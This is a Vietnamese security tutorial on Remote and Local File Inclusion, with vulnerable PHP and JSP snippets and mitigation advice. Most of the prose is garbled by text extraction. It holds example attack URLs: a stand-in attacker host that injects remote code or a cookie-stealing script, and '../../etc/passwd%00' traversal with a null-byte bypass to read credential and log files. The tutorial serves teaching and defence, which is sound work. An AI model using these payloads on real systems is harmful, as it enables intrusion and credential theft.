Tấn công khai thác lỗ hổng File Inclusion
T N CÔNG KHAI THÁC L H NG FILE INCLUSIONẤ Ỗ Ổ
L h ng File Inclusion cho phép tin t c truy c p trái phép vào nh ng ỗ ổ ặ ậ ữ
t p tin nh y c m trên máy ch web ho c th c thi các t p tin đ c h i ậ ạ ả ủ ặ ự ệ ộ ạ
b ng cách s d ng ch c năng “include”. L h ng này x y ra do c ằ ử ụ ứ ỗ ổ ả ơ
ch ki m tra đ u vào không đ c th c hi n t t, khi n tin t c có th ế ể ầ ượ ự ệ ố ế ặ ể
khai thác và chèn các d li u đ c h i.ự ệ ộ ạ
Hàm ‘Include’
Tr c khi nói v chi ti t l h ng File Inclusion, chúng ta c n hi u s qua ướ ề ế ỗ ổ ầ ể ơ
v m t l i g i hàm ‘include()’. Toàn b n i dung trong m t file c th s ề ộ ờ ọ ộ ộ ộ ụ ể ẽ
đ c sao chép vào m t file khác ch a l i g i ‘include’. Ph ng th c này ượ ộ ứ ờ ọ ươ ứ
đ c s d ng nh m tránh vi c code l p và có th s d ng b t kì lúc nào. ượ ử ụ ằ ệ ặ ể ử ụ ấ
L p trình viên th ng s d ng hàm include() nh m thêm nh ng d li u, ậ ườ ử ụ ằ ữ ữ ệ
t p tin mã ngu n dùng chung c a các t p tin trong ng d ng. Nh ng n i ệ ồ ủ ệ ứ ụ ữ ơ
th ng đ c s d ng nh footers, headers, menu files … D i đây là m t ườ ượ ử ụ ư ướ ộ
ví d đ n gi n v hàm include.ụ ơ ả ề
1. M t menu trang nh sauộ ư
menu.php:
<?php
echo ‘<a href=”/home.asp”>HOME</a>
<a href=”/details.asp”>DETAILS</a>
<a href=”/contact.asp”>CONTACT US</a>;
?>
2. Menu trang này có th đ c s d ng l i trong t t c các trang c a ể ượ ử ụ ạ ấ ả ủ
ng d ng b ng cách dùng hàm include()ứ ụ ằ
abc.php
<html>
<body>
<div class =”menu”><?php include ‘menu.php’;?></div>
<p>WELCOME</p>
</body>
</html>
3. Gi thì file menu.php đã đ c bao hàm trong file abc.php, b t c khiờ ượ ấ ứ
nào abc.php đ c truy c p, n i dung trong file menu.php s đ c sao ượ ậ ộ ẽ ượ
chép vào abc.php và th c thi.ự
Tuy nhiên v n đ này có th b tin t c khai thác và t n công tr l i website ấ ề ể ị ặ ấ ở ạ
gây nh ng h u qu r t nguy hi m. Đây là 2 l h ng chính r t nguy hi m ữ ậ ả ấ ể ỗ ổ ấ ể
liên quan đ n hàm include()ế
Remote file inclusion
Local file inclusion
L u ý: Trong PHP có 1 s hàm cũng có ch c năng t ng t , hay các hàm doư ố ứ ươ ự
ng i l p trình t vi t nh : Inlude_once(), require(), require_once()…ườ ậ ự ế ư
L h ng Remote file inclusionỗ ổ
RFI cho phép tin t c include và th c thi trên máy ch m c tiêu m t t p tin ặ ự ủ ụ ộ ệ
đ c l u tr t xa. Tin t c có th s d ng RFI đ ch y m t mã đ c trên ượ ư ữ ừ ặ ể ử ụ ể ạ ộ ộ
c máy c a ng i dùng và phía máy ch . nh h ng c a ki u t n công ả ủ ườ ủ Ả ưở ủ ể ấ
này thay đ i t đánh c p t m th i session token ho c các d li u c a ổ ừ ắ ạ ờ ặ ữ ệ ủ
ng i dùng cho đ n vi c t i lên các webshell, mã đ c nh m đ n xâm h i ườ ế ệ ả ộ ằ ế ạ
hoàn toàn h th ng máy ch .ệ ố ủ
Khai thác l h ng Remote file inclusion trong PHPỗ ổ
PHP có nguy c cao b t n công RFI do vi c s d ng l nh include r t ơ ị ấ ệ ử ụ ệ ấ
nhi u và thi t đ t m c đ nh c a server cũng nh h ng m t ph n nào đó. ề ế ặ ặ ị ủ ả ưở ộ ầ
Đ b t đ u chúng ta c n tìm n i ch a file include trong ng d ng ph ể ắ ầ ầ ơ ứ ứ ụ ụ
thu c vào d li u đ u vào ng i dùng.ộ ữ ệ ầ ườ
1. M t trong nh ng n i ch a l h ng có th nh ví d d i đây, giá ộ ữ ơ ứ ỗ ổ ể ư ụ ướ
tr c a ‘testfile’ đ c cung c p b i ng i dùng:ị ủ ượ ấ ở ườ
www.victim_site.com/abc.php?testfile=example
2. Mã ngu n PHP ch a l h ng:ồ ứ ỗ ổ
$test = $_REQUEST[“testfile”];
Include($test.”.php”);
3. Thông s c a ‘testfile’ đ c l y t phía ng i dùng. Đo n mã s ố ủ ượ ấ ừ ườ ạ ẽ
l y giá tr ‘testfile’ và tr c ti p include nó vào file PHP.ấ ị ự ế
4. Sau đây là ví d v m t h ng t n công đ c s d ng đ i v i ụ ề ộ ướ ấ ượ ử ụ ố ớ
đo n mã trên:ạ
www.victim_site.com/abc.php?
test=http://www.attacker_site.com/attack_page
File “attack_page” đ c bao hàm vào trang có s n trên máy ch và th c thi ượ ẵ ủ ự
m i khi trang “abc.php” đ c truy c p. Tin t c s đ a mã đ c vào ỗ ượ ậ ặ ẽ ư ộ
“attack_page” và th c hi n hành vi đ c h i.ự ệ ộ ạ
Khai thác Remote file inclusion trong JSP
1. Gi s m t k ch b n n i m t trang JSP s d ng “c:import” nh m ả ử ộ ị ả ơ ộ ử ụ ằ
nh p m t tên t p tin nào đó do ng i dùng cung c p vào trang JSP ậ ộ ệ ườ ấ
hi n t i thông qua bi n đ u vào ‘test’:ệ ạ ế ầ
<c:import url=”<%= request.getParameter(“test”)%>”>
T n công:ấ
www.victim_site.com/abc.jsp?
test=http://www.attackersite.com/stealingcookie.js
2. Script đ c h i trong stealingcookie.js s đ c đ a vào trang c a ộ ạ ẽ ượ ư ủ
n n nhân và đi u khi n b i tin t c.ạ ề ể ở ặ
T n công Local file inclusionấ
L h ng Local file inclusion n m trong quá trình include file c c b có s n ỗ ổ ằ ụ ộ ẵ
trên server. L h ng x y ra khi đ u vào ng i dùng ch a đ ng d n đ n ỗ ổ ả ầ ườ ứ ườ ẫ ế
file b t bu c ph i include. Khi đ u vào này không đ c ki m tra, tin t c cóắ ộ ả ầ ượ ể ặ
th s d ng nh ng tên file m c đ nh và truy c p trái phép đ n chúng, tin ể ử ụ ữ ặ ị ậ ế
t c cũng có th l i d ng các thông tin tr v trên đ đ c đ c nh ng t p ặ ể ợ ụ ả ề ể ọ ượ ữ ệ
tin nh y c m trên các th m c khác nhau b ng cách chèn các ký t đ c ạ ả ư ụ ằ ự ặ
bi t nh “/”, “../”, “-“.ệ ư
Local file inclusion trong PHP:
1. Ví d đ ng d n sau có th b t n công:ụ ườ ẫ ể ị ấ
http://victim_site/abc.php?file=userinput.txt
2. Giá tr c a bi n ‘file’ đ c l y vào đo n mã PHP d i đây:ị ủ ế ượ ấ ạ ướ
<?php
…
include $_REQUEST[‘file’];
…
?>
3. Gi thì tin t c s đ a mã đ c vào bi n ‘file’ đ truy c p trái phép ờ ặ ẽ ư ộ ế ể ậ
vào file trong cùng ch m c ho c s d ng kí t duy t ch m c nh ủ ụ ặ ử ụ ự ệ ỉ ụ ư
“../” đ di chuy n đ n ch m c khác. Ví d tin t c l y đ c log b ng ể ể ế ỉ ụ ụ ặ ấ ượ ằ
cách cung c p đ u vào “/apache/logs/error.log” ho c ấ ầ ặ
“/apache/logs/access.log” hay vi c đánh c p d li u liên quan đ n tài ệ ắ ữ ệ ế
kho n c a ng i dùng thông qua “../../etc/passwd” trên h th ng Unix.ả ủ ườ ệ ố
Trong m t s tr ng h p đ c bi t m t ph n m r ng m c đ nh s đ c ộ ố ườ ợ ặ ệ ộ ầ ở ộ ặ ị ẽ ượ
thêm vào thông tin đ c đ a lên t trình duy t tr c khi đ a vào hàm ượ ư ừ ệ ướ ư
Include(). Cách t t nh t tránh nh ng ph n m r ng này là s d ng byte ố ấ ữ ầ ở ộ ử ụ
r ng k t thúc “%00” đ v t qua. Đây là cách đ c các tin t c s d ng đỗ ế ể ượ ượ ặ ử ụ ể
th c hi n hành vi đ c h i và truy c p b t c ki u file nào.ự ệ ộ ạ ậ ấ ứ ể
Ví d đ u vào đ c l y t đo n mã sau và ph n m r ng m c đ nh là ụ ầ ượ ấ ừ ạ ầ ở ộ ặ ị
“.php”.
<?php
“include/”.include($_GET[‘testfile’].”.php”);
?>
N u tin t c mu n truy c p m t file không ph i ki u “text” chúng s s ế ặ ố ậ ộ ả ể ẽ ử
d ng m t %00 (kí t byte r ng sau tên c a file.ụ ộ ự ỗ ủ
http://victim_site/abc.php?testfile=../../../../etc/passwd%00
T ng t Local file inclusion trong JSP:ươ ự
1. Gi s URL d i đây đ c yêu c u trong ng d ng và bi n ‘test’ ả ử ướ ượ ầ ứ ụ ế
l y d li u đ u vào trong l nh include:ấ ữ ệ ầ ệ
www.victim_site.com/abc.jsp?test=xyz.jsp
Giá tr c a bi n ‘test’ s đ c chuy n qua:ị ủ ế ẽ ượ ể
…
<jsp:include page=”<%= (String)request.getParameter(\”test\”)%>”>
…
2. Mũi t n công dành cho đo n mã trên có th n m trong m t file ấ ạ ể ằ ộ
database h p l , đ c s d ng nh m t đ u vào. Do có l h ng local ợ ệ ượ ử ụ ư ộ ầ ỗ ổ
file inclusion n m trong ng d ng, file database s đ c include vào ằ ứ ụ ẽ ượ
trang JSP:
www.victim_site.com/abc.jsp?test=/WEB-INF/database/passwordDB
Kh c ph c l h ng File Inclusionắ ụ ỗ ổ
L h ng x y ra khi vi c ki m tra đ u vào không đ c chú tr ng. Khuy n ỗ ổ ả ệ ể ầ ượ ọ ế
cáo riêng thì không nên ho c h n ch t i m c t i thi u ph i s d ng các ặ ạ ế ớ ứ ố ể ả ử ụ
bi n t “User Input” đ đ a vào hàm include hay eval. Trong tr ng h p ế ừ ể ư ườ ợ
ph i s d ng. v i các thông tin đ c nh p t bên ngoài, tr c khi đ a vào ả ử ụ ớ ượ ậ ừ ướ ư
hàm c n đ c ki m tra k l ngầ ượ ể ỹ ưỡ
Ch ch p nh n kí t và s cho tên file (A-Z 0-9). Blacklist toàn b kí t đ cỉ ấ ậ ự ố ộ ự ặ
bi t không đ c s d ng.ệ ượ ử ụ
Gi i h n API cho phép vi c include file t m t ch m c xác đ nh nh m ớ ạ ệ ừ ộ ỉ ụ ị ằ
tránh directory traversal.
T n công File Inclusion có th nguy hi m h n c SQL Injection do đó th c ấ ể ể ơ ả ự
s c n thi t ph i có nh ng bi n pháp kh c ph c l h ng này. Ki m tra d ự ầ ế ả ữ ệ ắ ụ ỗ ổ ể ữ
li u đ u vào h p lý là chìa khóa đ gi i quy t v n đ .ệ ầ ợ ể ả ế ấ ề
có thể bạn quan tâm
Tìm hiểu về Metasploit - Công cụ khai thác lỗ hổng
6
2.635
457
An ninh, bảo mật
6
(New)
Luận văn thạc sĩ khoa máy tính: Nghiên cứu một số kỹ thuật mật mã ứng...
25
798
375
Thạc sĩ cao học
25
(New)
CÔNG NGHỆ : Điều kiện áp dụng khai thác rừng hiện nay ở Việt Nam
2
931
380
Giáo án, bài giảng lớp 7
2
(New)
Luận văn: XN khai thác công trình thủy lợi huyện Gia Lộc, Hải Dương- L...
31
694
306
Thạc sĩ cao học
31
(New)
Viễn cảnh về khai thác thông tin và lập trình cỏng thông tin qua tài l...
22
1.217
293
Kỹ thuật
22
(New)
Công nghệ WiMAX và đảm bảo chất lượng dịch vụ QoS cho người dùng đồng...
77
777
341
Kỹ thuật
77
(New)
Luận văn thạc sĩ: Khái quát về khai phá dữ liệu web, các kỹ thuật tríc...
26
926
374
Thạc sĩ cao học
26
(New)
Kỹ thuật khai thác lỗi tràn bộ đệm
0
830
309
Cơ sở dữ liệu
(New)
thông tin tài liệu
Lỗ hổng File Inclusion cho phép tin tặc truy cập trái phép vào những tập tin nhạy cảm trên máy chủ web hoặc thực thi các tệp tin độc hại bằng cách sử dụng chức năng “include”. Lỗ hổng này xảy ra do cơ chế kiểm tra đầu vào không được thực hiện tốt, khiến tin tặc có thể khai thác và chèn các dự liệu độc hại.
Mở rộng để xem thêm
từ khóa liên quan
tài liệu mới trong mục này
tài liệu hot trong mục này
tài liệu giúp tôi
Nếu bạn không tìm thấy tài liệu mình cần có thể gửi yêu cầu ở đây để chúng tôi tìm giúp bạn!
xem nhiều trong tuần
Giáo trình Quản trị học của Đại học kinh tế quốc dân
4 đề thi học sinh giỏi Toán lớp 2, có đáp án kèm theo
Luận văn về các tác nhân ảnh hưởng đến kết quả học tập của sinh viên chính quy trường Đại Học Kinh Tế- TP HCM
Mẫu slide thuyết trình về Golf
Bài tập ôn tập cuối tuần lớp 3: Tuần 21
Bài tập ôn tập cuối tuần lớp 2: Tuần 21
yêu cầu tài liệu
Giúp bạn tìm tài liệu chưa có
×
